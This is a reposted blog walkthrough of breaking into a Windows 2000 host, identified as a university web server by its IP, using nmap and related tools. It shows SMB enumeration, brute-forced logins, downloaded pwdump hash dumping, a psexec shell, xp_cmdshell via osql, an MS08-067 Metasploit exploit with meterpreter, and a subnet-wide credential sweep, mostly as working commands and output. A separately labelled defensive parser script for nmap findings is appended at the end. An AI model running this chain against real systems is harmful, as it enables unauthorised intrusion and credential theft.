Advanced use of nmap in practice

Reposted; since the target is a Windows 2000 system, it is not very representative.

Guangxi Normal University website http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc?
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser // scan result
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
root@bt:~# wget http://swamp.foofus.net/fizzgig/pwdump/pwdump6-1.7.2-exe-only.tar.bz2
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe // get a cmd shell
PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'" // log in remotely as sa and execute a command
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 // check the target machine for vulnerabilities
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
root@bt:~# msfconsole // use the MS08-067 vulnerability in msf to exploit the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2
msf exploit(ms08_067_netapi) > sessions -l
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try the user names together with the captured hash against the whole internal subnet
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
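Every finding above (anonymous IPC$ access, a blank administrator password, a guessable password, a missing MS08-067 patch) shows up in the `Host script results:` block of the nmap report, so an authorized internal scan across many hosts is easiest to remediate from a parsed findings list. The script below is an added example, not part of the original post; the report it parses is a constructed sample in the same shape as the outputs above, with a placeholder host.

```python
import re

# Constructed sample in the shape of the nmap reports above (placeholder host, not a real system).
SAMPLE_REPORT = """\
Nmap scan report for lab-host (192.0.2.10)
Host script results:
| smb-enum-shares:
|   IPC$
|     Anonymous access: READ
|   C$
|     Anonymous access: <none>
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
"""

HEADER = re.compile(r"^\|_?\s*([\w-]+):\s*$")                 # "| smb-brute:"
LOGIN = re.compile(r"^(\S+?):(\S*) => Login was successful")  # "user:pass => ..."
ANON = re.compile(r"Anonymous access: (READ|WRITE|READ/WRITE)")

def triage(report: str) -> list:
    """Turn NSE host-script lines into (host, severity, finding) tuples."""
    findings, host, script, share, active = [], None, None, None, False
    for raw in report.splitlines():
        if m := re.match(r"Nmap scan report for (.+)", raw):
            host, active = m.group(1), False
        elif raw.startswith("Host script results:"):
            active = True
        elif not active or not raw.startswith("|"):
            active = False                          # left the script block
        elif h := HEADER.match(raw):
            script = h.group(1)
        else:
            body = raw.lstrip("|_ ").strip()        # drop the NSE tree prefix
            if script == "smb-enum-shares":
                if not body.startswith("Anonymous access"):
                    share = body                    # share name precedes its access line
                elif a := ANON.search(body):
                    findings.append((host, "high", f"anonymous {a.group(1)} on {share}"))
            elif script == "smb-brute" and (lg := LOGIN.match(body)):
                user, pw = lg.groups()
                kind = "blank" if pw == "<blank>" else "guessable"
                findings.append((host, "critical" if kind == "blank" else "high",
                                 f"{kind} password for {user}"))
            elif script == "smb-check-vulns" and body.endswith("VULNERABLE"):
                findings.append((host, "critical", f"missing patch {body.split(':')[0]}"))
    return findings
```

Feed it the concatenated normal-format output of a sweep (`nmap -oN`) and each host contributes its own tuples, since the host resets on every `Nmap scan report for` line.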
posted @ 2013-05-26 09:08 vigarbuaa